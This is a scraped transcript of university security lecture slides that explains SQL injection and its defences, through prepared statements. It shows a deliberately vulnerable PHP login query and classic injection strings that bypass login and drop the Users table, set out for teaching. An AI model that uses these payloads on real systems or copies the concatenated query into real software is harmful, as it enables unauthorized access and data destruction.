CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS....
Transcript of CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS....
![Page 1: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/1.jpg)
CLASSICWEB ATKS & DEFS
GRAD SECSEP 19 2017
![Page 2: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/2.jpg)
TODAY’S PAPERS
![Page 3: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/3.jpg)
A very basic web architecture
Client Server
![Page 4: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/4.jpg)
A very basic web architecture
Client Server
![Page 5: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/5.jpg)
A very basic web architecture
Client Server
![Page 6: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/6.jpg)
A very basic web architecture
Browser Web server
Client Server
![Page 7: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/7.jpg)
A very basic web architecture
Browser Web server
Database
Client Server
![Page 8: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/8.jpg)
A very basic web architecture
Browser Web server
Database
Client Server
(Private) Data
![Page 9: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/9.jpg)
A very basic web architecture
Browser Web server
Database
Client Server
(Private) Data
DB is a separate entity,logically (and often physically)
![Page 10: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/10.jpg)
SQL security
![Page 11: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/11.jpg)
Databases• Provide data storage & data manipulation
• Database designer lays out the data into tables
• Programmers query the database
• Database Management Systems (DBMSes) provide • semantics for how to organize data • transactions for manipulating data sanely • a language for creating & querying data
- and APIs to interoperate with other languages • management via users & permissions
![Page 12: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/12.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
![Page 13: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/13.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
Table
![Page 14: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/14.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
![Page 15: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/15.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
Table name
![Page 16: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/16.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
![Page 17: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/17.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
Column
![Page 18: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/18.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
![Page 19: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/19.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
Row(Record)
![Page 20: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/20.jpg)
Databases: basicsUsers
Name Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
![Page 21: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/21.jpg)
Database transactionsTransactions are the unit of work on a database
![Page 22: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/22.jpg)
Database transactionsTransactions are the unit of work on a database
“Deduct $100 from Alice; Add $100 to Bob”
“Give me everyone in the User table who is listed as taking CMSC414 in the Classes table”
![Page 23: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/23.jpg)
Database transactionsTransactions are the unit of work on a database
“Deduct $100 from Alice; Add $100 to Bob”
“Give me everyone in the User table who is listed as taking CMSC414 in the Classes table” 2 reads
2 writes
![Page 24: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/24.jpg)
Database transactionsTransactions are the unit of work on a database
“Deduct $100 from Alice; Add $100 to Bob”
“Give me everyone in the User table who is listed as taking CMSC414 in the Classes table”
1 transaction2 reads
2 writes
![Page 25: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/25.jpg)
Database transactions
• Typically want ACID transactions • Atomicity: Transactions complete entirely or not at all • Consistency: The database is always in a valid state
(but not necessarily correct) • Isolation: Results from a transaction aren’t visible
until it is complete • Durability: Once a transaction is committed, it
remains, despite, e.g., power failures
Transactions are the unit of work on a database
“Deduct $100 from Alice; Add $100 to Bob”
“Give me everyone in the User table who is listed as taking CMSC414 in the Classes table”
1 transaction2 reads
2 writes
![Page 26: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/26.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
![Page 27: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/27.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
SELECT Age FROM Users WHERE Name=‘Dee’;
![Page 28: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/28.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
SELECT Age FROM Users WHERE Name=‘Dee’; 28
![Page 29: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/29.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
SELECT Age FROM Users WHERE Name=‘Dee’; 28UPDATE Users SET email=‘[email protected]’ WHERE Age=32; -- this is a comment
![Page 30: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/30.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
SELECT Age FROM Users WHERE Name=‘Dee’; 28UPDATE Users SET email=‘[email protected]’ WHERE Age=32; -- this is a comment
![Page 31: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/31.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
SELECT Age FROM Users WHERE Name=‘Dee’; 28UPDATE Users SET email=‘[email protected]’ WHERE Age=32; -- this is a comment
INSERT INTO Users Values(‘Frank’, ‘M’, 57, ...);
![Page 32: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/32.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
SELECT Age FROM Users WHERE Name=‘Dee’; 28UPDATE Users SET email=‘[email protected]’ WHERE Age=32; -- this is a comment
INSERT INTO Users Values(‘Frank’, ‘M’, 57, ...);
![Page 33: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/33.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
SELECT Age FROM Users WHERE Name=‘Dee’; 28UPDATE Users SET email=‘[email protected]’ WHERE Age=32; -- this is a comment
INSERT INTO Users Values(‘Frank’, ‘M’, 57, ...);DROP TABLE Users;
![Page 34: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/34.jpg)
SQL (Standard Query Language)
UsersName Gender Age Email PasswordDee F 28 [email protected] j3i8g8haMac M 7 [email protected] a0u23bt
Charlie M 32 [email protected] 0aergjaDennis M 28 [email protected] 1bjb9a93Frank M 57 [email protected] ziog9gga
SELECT Age FROM Users WHERE Name=‘Dee’; 28UPDATE Users SET email=‘[email protected]’ WHERE Age=32; -- this is a comment
INSERT INTO Users Values(‘Frank’, ‘M’, 57, ...);DROP TABLE Users;
![Page 35: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/35.jpg)
Server-side code
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
Website
“Login code” (php)
Suppose you successfully log in as $user if this query returns any rows whatsoever
![Page 36: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/36.jpg)
Server-side code
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
Website
“Login code” (php)
Suppose you successfully log in as $user if this query returns any rows whatsoever
How could you exploit this?
![Page 37: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/37.jpg)
SQL injection
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
![Page 38: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/38.jpg)
SQL injection
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
frank’ OR 1=1); --
![Page 39: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/39.jpg)
SQL injection
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
frank’ OR 1=1); --
$result = mysql_query(“select * from Users where(name=‘frank’ OR 1=1); --
and password=‘whocares’);”);
![Page 40: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/40.jpg)
SQL injection
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
frank’ OR 1=1); DROP TABLE Users; --
Can chain together statements with semicolon:STATEMENT 1 ; STATEMENT 2
![Page 41: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/41.jpg)
SQL injection
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
frank’ OR 1=1); DROP TABLE Users; --
$result = mysql_query(“select * from Users where(name=‘frank’ OR 1=1); DROP TABLE Users; --
‘ and password=‘whocares’);”);
Can chain together statements with semicolon:STATEMENT 1 ; STATEMENT 2
![Page 42: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/42.jpg)
SQL injection
Buffer “errors”
XSS
CSRF
![Page 43: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/43.jpg)
SQL injection
Buffer “errors”
XSS
CSRF
![Page 44: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/44.jpg)
![Page 45: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/45.jpg)
![Page 46: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/46.jpg)
SQL injection countermeasures• Blacklisting: Delete the characters you don’t want
• ’ • -- • ;
• Downside: “Peter O’Connor” • You want these characters sometimes! • How do you know if/when the characters are bad?
![Page 47: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/47.jpg)
SQL injection countermeasures
• Check that the user-provided input is in some set of values known to be safe • Integer within the right range
• Given an invalid input, better to reject than to fix • “Fixes” may introduce vulnerabilities • Principle of fail-safe defaults
• Downside: • Um.. Names come from a well-known dictionary?
1. Whitelisting
![Page 48: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/48.jpg)
SQL injection countermeasures
• Escape characters that could alter control • ’ ⇒ \’ • ; ⇒ \; • - ⇒ \- • \ ⇒ \\
• Hard by hand, but there are many libs & methods • magic_quotes_gpc = On • mysql_real_escape_string()
• Downside: Sometimes you want these in your SQL!
2. Escape characters
![Page 49: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/49.jpg)
The underlying issue
• This one string combines the code and the data
• Similar to buffer overflows:
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
When the boundary between code and data blurs,we open ourselves up to vulnerabilities
![Page 50: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/50.jpg)
The underlying issue$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
select / from / where
* Users and
=
name $user
=
password $pass
![Page 51: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/51.jpg)
The underlying issue$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
select / from / where
* Users and
=
name $user
=
password $pass$user
![Page 52: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/52.jpg)
SQL injection countermeasures
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
3. Prepared statements & bind variablesKey idea: Decouple the code and the data
![Page 53: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/53.jpg)
SQL injection countermeasures
$db = new mysql(“localhost”, “user”, “pass”, “DB”);
$statement = $db->prepare(“select * from Userswhere(name=? and password=?);”);
$statement->bind_param(“ss”, $user, $pass);$statement->execute();
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
3. Prepared statements & bind variablesKey idea: Decouple the code and the data
![Page 54: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/54.jpg)
SQL injection countermeasures
$db = new mysql(“localhost”, “user”, “pass”, “DB”);
$statement = $db->prepare(“select * from Userswhere(name=? and password=?);”);
$statement->bind_param(“ss”, $user, $pass);$statement->execute();
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
Bind variables
3. Prepared statements & bind variablesKey idea: Decouple the code and the data
![Page 55: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/55.jpg)
SQL injection countermeasures
$db = new mysql(“localhost”, “user”, “pass”, “DB”);
$statement = $db->prepare(“select * from Userswhere(name=? and password=?);”);
$statement->bind_param(“ss”, $user, $pass);$statement->execute();
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
Bind variables
Bind variables are typed
3. Prepared statements & bind variablesKey idea: Decouple the code and the data
![Page 56: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/56.jpg)
SQL injection countermeasures
$db = new mysql(“localhost”, “user”, “pass”, “DB”);
$statement = $db->prepare(“select * from Userswhere(name=? and password=?);”);
$statement->bind_param(“ss”, $user, $pass);$statement->execute();
$result = mysql_query(“select * from Users where(name=‘$user’ and password=‘$pass’);”);
Bind variables
Bind variables are typed
Decoupling lets us compile now, before binding the data
3. Prepared statements & bind variablesKey idea: Decouple the code and the data
![Page 57: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/57.jpg)
The underlying issue$statement = $db->prepare(“select * from Users
